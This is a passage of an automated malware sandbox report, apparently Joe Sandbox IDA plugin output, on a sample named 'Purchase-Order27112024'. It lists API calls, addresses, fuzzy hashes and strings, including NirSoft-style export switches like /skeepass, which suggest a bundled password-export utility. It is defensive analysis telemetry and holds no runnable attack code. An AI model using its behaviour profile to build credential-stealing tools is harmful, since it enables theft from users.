                                                                                                      • String ID: ---
                                                                                                      • API String ID: 3437578500-2854292027
                                                                                                      • Opcode ID: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                                                      • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                      • Opcode Fuzzy Hash: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                                                      • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
APIs
• memset.MSVCRT ref: 0041087D
• memset.MSVCRT ref: 00410892
• GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
• SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
• SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
• SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
• GetModuleHandleW.KERNEL32(00000000), ref: 00410951
• LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
• GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
• LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
• GetSysColor.USER32(0000000F), ref: 00410999
• DeleteObject.GDI32(?), ref: 004109D0
• DeleteObject.GDI32(?), ref: 004109D6
• SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
Memory Dump Source
• Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
• String ID:
• API String ID: 1010922700-0
• Opcode ID: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
• Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
• Opcode Fuzzy Hash: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
• Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
APIs
  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
• GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
• malloc.MSVCRT ref: 004186B7
• free.MSVCRT ref: 004186C7
• GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
• free.MSVCRT ref: 004186E0
• GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
• malloc.MSVCRT ref: 004186FE
• GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
• free.MSVCRT ref: 00418716
• free.MSVCRT ref: 0041872A
• free.MSVCRT ref: 00418749
Strings
Memory Dump Source
• Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: free$FullNamePath$malloc$Version
• String ID: |A
• API String ID: 3356672799-1717621600
• Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
• Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
• Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
• Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: _wcsicmp
• String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
• API String ID: 2081463915-1959339147
• Opcode ID: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
• Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
• Opcode Fuzzy Hash: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
• Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
APIs
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
• GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
• GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
• GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
• GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
• GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
• FreeLibrary.KERNEL32(00000000), ref: 00413951
Strings
Memory Dump Source
• Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
• String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
• API String ID: 2012295524-70141382
• Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
• Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
• Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
• Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
• GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
• GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
• GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
• GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
• GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
Strings
Memory Dump Source
• Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
• API String ID: 667068680-3953557276
• Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
• Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
• Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
• Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
APIs
• GetDC.USER32(00000000), ref: 004121FF
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
• ReleaseDC.USER32(00000000,00000000), ref: 0041221F
• SetBkMode.GDI32(?,00000001), ref: 00412232
• SetTextColor.GDI32(?,00FF0000), ref: 00412240
• SelectObject.GDI32(?,?), ref: 00412251
• DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
• SelectObject.GDI32(00000014,00000005), ref: 00412291
  • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
  • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
  • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
• GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
• LoadCursorW.USER32(00000000,00000067), ref: 004122B5
• SetCursor.USER32(00000000), ref: 004122BC
• PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
• memcpy.MSVCRT(?,?,00002008), ref: 0041234D
Memory Dump Source
• Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
• String ID:
• API String ID: 1700100422-0
• Opcode ID: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
• Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
• Opcode Fuzzy Hash: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
• Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
APIs
• GetClientRect.USER32(?,?), ref: 004111E0
• GetWindowRect.USER32(?,?), ref: 004111F6
• GetWindowRect.USER32(?,?), ref: 0041120C
• GetDlgItem.USER32(00000000,0000040D), ref: 00411246
• GetWindowRect.USER32(00000000), ref: 0041124D
• MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
• BeginDeferWindowPos.USER32(00000004), ref: 00411281
• DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
• DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
• DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
• DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
• EndDeferWindowPos.USER32(?), ref: 0041130B
Memory Dump Source
• Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: Window$Defer$Rect$BeginClientItemPoints
• String ID:
APIs
• CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
• GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
  • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
  • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
• memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
• strchr.MSVCRT ref: 0040C140
• strchr.MSVCRT ref: 0040C151
• _strlwr.MSVCRT ref: 0040C15F
• memset.MSVCRT ref: 0040C17A
• CloseHandle.KERNEL32(00000000), ref: 0040C1C7
Similarity
• API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
• String ID: 4$h
Similarity
• API ID: memset$_snwprintf
• String ID: %%0.%df
APIs
• SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
• KillTimer.USER32(?,00000041), ref: 004060D7
• KillTimer.USER32(?,00000041), ref: 004060E8
• GetTickCount.KERNEL32 ref: 0040610B
• GetParent.USER32(?), ref: 00406136
• SendMessageW.USER32(00000000), ref: 0040613D
• BeginDeferWindowPos.USER32(00000004), ref: 0040614B
• EndDeferWindowPos.USER32(00000000), ref: 0040619B
• InvalidateRect.USER32(?,?,00000001), ref: 004061A7
Similarity
• API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
• String ID: A
APIs
• LoadMenuW.USER32(?,?), ref: 0040D97F
  • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
  • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
  • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
  • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
• DestroyMenu.USER32(00000000), ref: 0040D99D
• CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
• GetDesktopWindow.USER32 ref: 0040D9FD
• CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
• memset.MSVCRT ref: 0040DA23
• GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
• EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
• DestroyWindow.USER32(00000005), ref: 0040DA70
  • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
Similarity
• API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
• String ID: caption
Strings
• <table dir="rtl"><tr><td>, xrefs: 00410B00
• <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
• <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
• <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
Similarity
• API ID: memset$_snwprintf$wcscpy
• String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
APIs
• wcschr.MSVCRT ref: 00413972
• wcscpy.MSVCRT ref: 00413982
  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
• wcscpy.MSVCRT ref: 004139D1
• wcscat.MSVCRT ref: 004139DC
• memset.MSVCRT ref: 004139B8
  • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
  • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
• memset.MSVCRT ref: 00413A00
• memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
• wcscat.MSVCRT ref: 00413A27
Similarity
• API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
• String ID: \systemroot
Similarity
• API ID: wcscpy
• String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                      Similarity
                                                                                                      • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                      • String ID: 0$6
                                                                                                      • API String ID: 4066108131-3849865405
                                                                                                      • Opcode ID: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                                      • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                      • Opcode Fuzzy Hash: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                                      • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004082EF
                                                                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                      • memset.MSVCRT ref: 00408362
                                                                                                      • memset.MSVCRT ref: 00408377
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$ByteCharMultiWide
                                                                                                      • String ID:
                                                                                                      • API String ID: 290601579-0
                                                                                                      • Opcode ID: aa14e1b9e389497361ed401ed70ebc10d5f62d7ff5e107018b9223dc9ab6e0fb
                                                                                                      • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                      • Opcode Fuzzy Hash: aa14e1b9e389497361ed401ed70ebc10d5f62d7ff5e107018b9223dc9ab6e0fb
                                                                                                      • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                      APIs
                                                                                                      • memchr.MSVCRT ref: 00444EBF
                                                                                                      • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                      • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                      • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                      • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                                      • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                                      • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                                      • memset.MSVCRT ref: 0044505E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memchrmemset
                                                                                                      • String ID: PD$PD
                                                                                                      • API String ID: 1581201632-2312785699
                                                                                                      • Opcode ID: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                                                      • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                      • Opcode Fuzzy Hash: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                                                      • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                      APIs
                                                                                                      • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                      • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                      • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                      • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                      • GetParent.USER32(?), ref: 00409FA5
                                                                                                      • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                      • String ID:
                                                                                                      • API String ID: 2163313125-0
                                                                                                      • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                      • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                                      • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                      • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: free$wcslen
                                                                                                      • String ID:
                                                                                                      • API String ID: 3592753638-3916222277
                                                                                                      • Opcode ID: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                                                                      • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                      • Opcode Fuzzy Hash: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                                                                      • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040A47B
                                                                                                      • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                      • wcslen.MSVCRT ref: 0040A4BA
                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                      • wcslen.MSVCRT ref: 0040A4E0
                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpywcslen$_snwprintfmemset
                                                                                                      • String ID: %s (%s)$YV@
                                                                                                      • API String ID: 3979103747-598926743
                                                                                                      • Opcode ID: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                                                      • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                      • Opcode Fuzzy Hash: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                                                      • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                      APIs
                                                                                                      • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                                      • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                                      • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Library$AddressFreeLoadMessageProc
                                                                                                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                      • API String ID: 2780580303-317687271
                                                                                                      • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                      • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                      • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                      • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                      APIs
                                                                                                      • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000,?,00412758,00000000), ref: 0040A686
                                                                                                      • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669), ref: 0040A6A4
                                                                                                      • wcslen.MSVCRT ref: 0040A6B1
                                                                                                      • wcscpy.MSVCRT ref: 0040A6C1
